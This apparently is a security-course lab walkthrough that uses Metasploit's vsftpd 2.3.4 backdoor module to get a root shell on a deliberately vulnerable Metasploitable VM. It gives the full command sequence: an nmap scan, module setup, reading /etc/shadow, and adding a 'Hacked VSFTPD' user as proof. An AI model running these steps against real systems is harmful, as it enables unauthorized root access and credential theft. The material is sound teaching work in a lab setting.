ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploitable Project >> Exploits >> Current Page |Views: 51338

(Metasploitable Project: Lesson 8)

{ Exploiting VSFTPD 2.3.4 }


Section 0. Background Information
  1. Metasploitable 
  2. Pre-Requisite Lab  
  3. What is VSFTPD?
    • vsftpd, which stands for "Very Secure FTP Daemon",is an FTP server for Unix-like systems, including Linux. It is licensed under the GNU General Public License. It supports IPv6 and SSL.
    • In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised.  Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200.  This was not an issue of a security hole in vsftpd, instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.

  4. exploit/unix/ftp/vsftpd_234_backdoor
    • This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available.

  5. Lab Notes
    • In this lab we will do the following:
      1. Run an intense NMAP Scan on the Metasploitable VM
      2. Search for VSFTPD
      3. Exploit the VSFTPD Daemon and obtain root.

  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Determine Metasploitable IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.109.
      • Record your IP Address.

 

Section 4: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.111
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 5: Scanning the Victim with NMAP
  1. Run Intense NMAP Scan on the Metasploitable VM
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
      • This intense NMAP scan could take 3 to 5 minutes to run.
    • Instructions:
      1. nmap -p 1-65535 -T4 -A -v 192.168.1.109 2>&1 | tee /var/tmp/scan.txt

     

  2. Looking for vsftp
    • Instructions:
      1. cd /var/tmp
      2. grep -i vsftp scan.txt
    • Note(FYI):
      • vsftpd runs on port 21.

 

Section 6: Exploit vsftpd 2.3.4
  1. Start the Metasploit Console
    • Instructions:
      1. msfconsole

     

  2. Use the VSFTPD v2.3.4 Backdoor Command Execution Exploit
    • Instructions:
      1. search vsftpd
      2. use exploit/unix/ftp/vsftpd_234_backdoor

     

  3. Set RHOST (Victim IP Address)
    • Instructions:
      1. show options
      2. set RHOST 192.168.1.109
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).

     

  4. Exploit
    • Instructions:
      1. exploit
    • Note(FYI):
      • Now you should see a Command Shell Session opened between BackTrack to Metasploitable.

     

  5. Got Root?
    • Instructions:
      1. whoami
      2. hostname
      3. grep root /etc/shadow
    • Note(FYI):
      • Congratulations you now have root.

     

Section 7: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. whoami
      2. useradd -m -d /home/student3 -c "Hacked VSFTPD" -s /bin/bash student3
      3. grep student3 /etc/passwd
      4. date
      5. echo "Your Name"
        • Put in your actual name in place of "Your Name"
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth